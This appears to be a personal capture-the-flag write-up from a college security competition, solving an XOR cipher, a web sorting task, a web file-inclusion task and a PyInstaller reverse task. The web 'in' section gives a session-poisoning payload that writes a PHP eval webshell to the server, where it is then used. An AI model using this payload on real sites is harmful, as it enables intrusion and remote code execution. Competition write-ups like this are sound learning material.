2nd Guangdong College Student Cyber Security Attack and Defense Competition: a personal write-up
Crypto
crypto-xor2
We are given task.py and cipher, the encrypted flag. Opening cipher in WinHex, the hex values look like XOR output. The task.py source shows that the encryption XORs the flag byte by byte against the key, cycling through the key, and it notes that xxxx is not the real key:

from secret import flag

key = "xxxx"  # not real key
cipher = ""
for i, c in enumerate(flag):
    cipher += chr(ord(c) ^ ord(key[i % 4]))   # repeating 4-byte XOR key

with open("cipher", "w") as f:
    f.write(cipher)

The flag has the form flag{xxx}, so its first four characters are f, l, a, g. XORing each of them with the corresponding byte of cipher gives the key, and it turns out xxxx is the key after all (a decoy, then?).

A script to reverse it gives the flag:

key = "xxxx"  # the "not real key" turns out to be the real one

with open('cipher') as f:
    cipher = f.read()

def jiemi(cipher):   # jiemi = decrypt
    flag = ''
    for i, c in enumerate(cipher):
        flag += chr(ord(c) ^ ord(key[i % 4]))
    print(flag)   # flag{fccb0665-bce5-d329-aca7-99179bdc9ed3}

jiemi(cipher)
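The key recovery done by hand above, as an added example that is not part of the write-up: given a known plaintext prefix, recover a repeating XOR key and decrypt, working on bytes rather than the text-mode file the challenge used. It also lists which key lengths the known prefix is consistent with, which the write-up did not need because the key length was given. The flag, key and ciphertext below are constructed, and the function names are my own.

```python
from itertools import cycle

def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same function encrypts and decrypts."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))

def consistent_key_lengths(cipher: bytes, known_prefix: bytes) -> list:
    """Key lengths (up to the length of the known prefix) that the known-plaintext
    key stream is consistent with. The stream is cipher XOR prefix; a key of
    length L must make that stream repeat with period L."""
    stream = bytes(c ^ p for c, p in zip(cipher, known_prefix))
    return [L for L in range(1, len(stream) + 1)
            if all(stream[i] == stream[i % L] for i in range(len(stream)))]

def recover_key(cipher: bytes, known_prefix: bytes, key_len: int) -> bytes:
    """Known plaintext: prefix XOR cipher is the key stream, and its first key_len
    bytes are the key. Raises if the prefix contradicts that key length."""
    if len(known_prefix) < key_len:
        raise ValueError("need at least key_len bytes of known plaintext")
    if key_len not in consistent_key_lengths(cipher, known_prefix):
        raise ValueError("known plaintext is inconsistent with a key of length %d" % key_len)
    return bytes(c ^ p for c, p in zip(cipher[:key_len], known_prefix[:key_len]))

# Constructed sample (not the challenge's real flag, key or cipher file).
SAMPLE_KEY = b"k3y!"
SAMPLE_FLAG = b"flag{constructed-sample-flag}"
SAMPLE_CIPHER = xor_bytes(SAMPLE_FLAG, SAMPLE_KEY)

def solve(cipher: bytes = SAMPLE_CIPHER, known_prefix: bytes = b"flag{", key_len: int = 4) -> bytes:
    """Recover the key from the known prefix and decrypt the whole ciphertext."""
    return xor_bytes(cipher, recover_key(cipher, known_prefix, key_len))

if __name__ == "__main__":
    print(consistent_key_lengths(SAMPLE_CIPHER, b"flag{"))   # [4, 5]
    print(solve().decode())                                  # flag{constructed-sample-flag}
```

With only five known bytes, a key of length 5 or more is trivially consistent, so the list of candidate lengths is only informative up to the prefix length; a longer known prefix (or a plaintext statistic such as printable-ASCII ratio) is what narrows it down further.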
Web
easy_ctf
Fetch the page with requests, sort its characters, and POST the result back, sending the headers and the cookie so Python reuses the earlier session. The sorting function was copied from somewhere online:

# -*- coding:utf-8 -*-
import requests
import re

def paixu(s):   # paixu = sort: by frequency, most frequent first (the opposite of what the task asks for)
    dic = {}
    flag = ''
    for i in s:
        dic[i] = s.count(i)
    pairs = sorted(dic.items(), key=lambda d: d[1], reverse=True)
    for i, j in pairs:
        flag += i
        print(i, end="")
    return flag

url = 'http://120.79.191.238:41227/'
header = {
    'Host': '120.79.191.238:41227',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://120.79.191.238:41227/',
    'Referer': 'http://120.79.191.238:41227/',
    'Cookie': 'PHPSESSID=0do0gj80dg24120ctdblthjdm7',
    'Upgrade-Insecure-Requests': '1'
}
cookie = {'PHPSESSID': '0do0gj80dg24120ctdblthjdm7'}

r = requests.session()
data = {'ans': '1'}
post = r.post(url, headers=header, cookies=cookie, data=data)   # post any value just to get the HTML
html = post.text
html = re.findall("\n(.+?)<td", html)   # extract the characters; re.findall returns a list
paixuv = ''.join(html)                  # join the list into one string
print(paixuv)
value = paixu(paixuv)                   # sort, most frequent first
print(value)
value = value[::-1]                     # reverse the string, so least frequent comes first
data = {'ans': value}
post = r.post(url, headers=header, cookies=cookie, data=data)
print(post.text)
in
The action.php page takes a parameter file=2.txt, which is a file inclusion. Using the php://filter pseudo-protocol we can read the source of index and action.
The $_POST name value is written into the session, so try reading out the session file location.
Once the session file can be read, put PHP code into the name value: when the file is included it is treated as PHP and executed. Payload: name=<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>'); ?> The response contains username|s:68:"";. Requesting shell.php over HTTP shows the webshell was written; connect with AntSword and find the flag file in the directory.
Reverse
pyre
Only pyre.exe is provided. The icon looks like a PyInstaller bundle, so check whether pyinstxtractor.py can unpack it into .pyc files:

python .\pyinstxtractor.py .\pyre.exe

After it runs a new directory appears, and 1.pyc in it is the original script, but it will not decompile. Try repairing the header: overwrite the first 16 bytes of 1.pyc with the first 16 bytes of struct.pyc, then submit it to an online decompiler.
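The header repair described above, as an added example rather than anything from the write-up: copy the 16-byte header of a known-good .pyc from the same bundle (struct.pyc) onto the entry script's .pyc (1.pyc) and sanity-check the result. The 16-byte layout (magic, flags, then mtime and size or a source hash) is the CPython 3.7+ format. The output file name 1_fixed.pyc, the function names, and the sample bytes are my own; the prepend option covers an extractor that writes the entry script with no header bytes at all, which is an assumption about other extractor versions, not something the write-up states.

```python
import struct
import sys

HEADER_LEN = 16   # CPython 3.7+ pyc: magic (4) + flags (4) + mtime/size or source hash (8)

def parse_header(header: bytes) -> dict:
    """Split a 3.7+ pyc header into its fields so a repaired file can be sanity-checked."""
    if len(header) < HEADER_LEN:
        raise ValueError("header too short")
    magic = header[:4]
    if magic[2:4] != b"\r\n":
        raise ValueError("not a pyc magic number")
    version_tag, = struct.unpack("<H", magic[:2])
    flags, = struct.unpack("<I", header[4:8])
    return {"version_tag": version_tag, "flags": flags, "rest": header[8:HEADER_LEN]}

def patch_header(reference: bytes, target: bytes, prepend: bool = False) -> bytes:
    """Copy the header of a known-good .pyc (struct.pyc in the write-up) onto target.
    prepend=False overwrites target's first 16 bytes, as done by hand in WinHex above;
    prepend=True is for a target that carries no header bytes at all (assumption about
    other extractor versions)."""
    parse_header(reference)   # fail early if the reference is not a pyc
    body = target if prepend else target[HEADER_LEN:]
    return reference[:HEADER_LEN] + body

def repair_file(reference_path: str, target_path: str, out_path: str, prepend: bool = False) -> dict:
    """Read both files, write the repaired copy to out_path, return its parsed header."""
    with open(reference_path, "rb") as f:
        reference = f.read()
    with open(target_path, "rb") as f:
        target = f.read()
    fixed = patch_header(reference, target, prepend)
    with open(out_path, "wb") as f:
        f.write(fixed)
    return parse_header(fixed)

# Constructed sample bytes: the CPython 3.8 magic (3413 = 0x0d55, i.e. b"U\r\r\n") followed by
# zeroed flags/mtime/size, and a dummy target whose first 16 bytes are junk.
SAMPLE_REFERENCE = b"U\r\r\n" + b"\x00" * 12 + b"\xe3reference-body"
SAMPLE_TARGET = b"\xff" * HEADER_LEN + b"\xe3target-body"

if __name__ == "__main__":
    # usage: python fix_pyc_header.py struct.pyc 1.pyc 1_fixed.pyc   (script and output names are assumptions)
    if len(sys.argv) == 4:
        print(repair_file(sys.argv[1], sys.argv[2], sys.argv[3]))
    else:
        print(parse_header(patch_header(SAMPLE_REFERENCE, SAMPLE_TARGET)))
```

The version tag in the copied magic is what the decompiler keys on, so the reference .pyc must come from the same bundle (and thus the same interpreter) as the broken one; a header borrowed from a different Python version will parse but the code object that follows will not match it.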
The decompiled result:

def check():
    a = input('plz input your flag:')
    c = [144, 163, 158, 177, 121, 39, 58, 58, 91, 111, 25, 158, 72, 53, 152,
         78, 171, 12, 53, 105, 45, 12, 12, 53, 12, 171, 111, 91, 53, 152, 105,
         45, 152, 144, 39, 171, 45, 91, 78, 45, 158, 8]
    if len(a) != 42:
        print('wrong length')
        return 0
    b = None   # the decompiler did not recover this constant
    for i in range(len(a)):
        if ord(a[i]) * 33 % b != c[i]:
            print('wrong')
            return None
    print('win')

check()
b is unknown, so brute-force b first.

# ord('f') * 33 % b == 144, and likewise for 'l', 'a', 'g'
for b in range(1, 4125):
    if (ord('f') * 33) % b == 144:
        if (ord('l') * 33) % b == 163:
            if (ord('a') * 33) % b == 158:
                if (ord('g') * 33) % b == 177:
                    print(b)   # 179
Inverting the remainder, a brute-force script:

c = [144, 163, 158, 177, 121, 39, 58, 58, 91, 111, 25, 158, 72, 53, 152,
     78, 171, 12, 53, 105, 45, 12, 12, 53, 12, 171, 111, 91, 53, 152, 105,
     45, 152, 144, 39, 171, 45, 91, 78, 45, 158, 8]
b = 179
for i in range(len(c)):
    for d in range(1, 24):   # ord('}') = 125, and 125 * 33 // 179 = 23 is the largest possible quotient
        if (b * d + c[i]) % 33 == 0:
            print(chr((b * d + c[i]) // 33), end='')   # flag{2889e7a3-0d6b-4cbb-b6e9-04c0f26c9dca}
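The two steps above (find b from the known prefix, then undo ord(ch) * 33 % b), as an added example that is not the write-up's code. It generalises the quotient brute force: because gcd(33, 179) = 1, each byte is just c * 33^-1 mod b, and since every flag byte is smaller than b the residue is the byte itself, so no per-character search is needed. The table c is the one from check(); the function names are my own, and pow(x, -1, m) needs Python 3.8 or later.

```python
from math import gcd

# The table from the decompiled check(), unchanged.
C = [144, 163, 158, 177, 121, 39, 58, 58, 91, 111, 25, 158, 72, 53, 152,
     78, 171, 12, 53, 105, 45, 12, 12, 53, 12, 171, 111, 91, 53, 152, 105,
     45, 152, 144, 39, 171, 45, 91, 78, 45, 158, 8]
MULT = 33

def encode(s: str, b: int, mult: int = MULT) -> list:
    """The transformation check() applies to the input before comparing it with c."""
    return [ord(ch) * mult % b for ch in s]

def find_modulus(table: list, known_prefix: str, mult: int = MULT) -> list:
    """All moduli b for which the known prefix reproduces the start of the table.
    ord('}') * mult is the largest value a printable flag byte can produce, so a
    larger b would leave every table entry a multiple of mult; we stop there."""
    limit = ord('}') * mult
    return [b for b in range(2, limit + 1)
            if encode(known_prefix, b, mult) == table[:len(known_prefix)]]

def recover(table: list, b: int, mult: int = MULT) -> str:
    """Invert ord(ch) * mult % b with the modular inverse of mult.
    Valid when gcd(mult, b) == 1 and every original byte is < b."""
    if gcd(mult, b) != 1:
        raise ValueError("mult and b are not coprime, so the map is not invertible")
    inv = pow(mult, -1, b)
    return ''.join(chr(t * inv % b) for t in table)

def solve(table: list = C, known_prefix: str = "flag") -> str:
    """Find the unique modulus consistent with the prefix and decode the whole table."""
    candidates = find_modulus(table, known_prefix)
    if len(candidates) != 1:
        raise ValueError("modulus is not uniquely determined: %r" % candidates)
    return recover(table, candidates[0])

if __name__ == "__main__":
    print(find_modulus(C, "flag"))   # [179]
    print(solve())                   # flag{2889e7a3-0d6b-4cbb-b6e9-04c0f26c9dca}
```

Four known characters pin b down here because b must divide ord(ch) * 33 - c[i] for each of them, and those differences share only the factor 179; with a shorter prefix find_modulus can return several candidates, which is why solve() insists on exactly one.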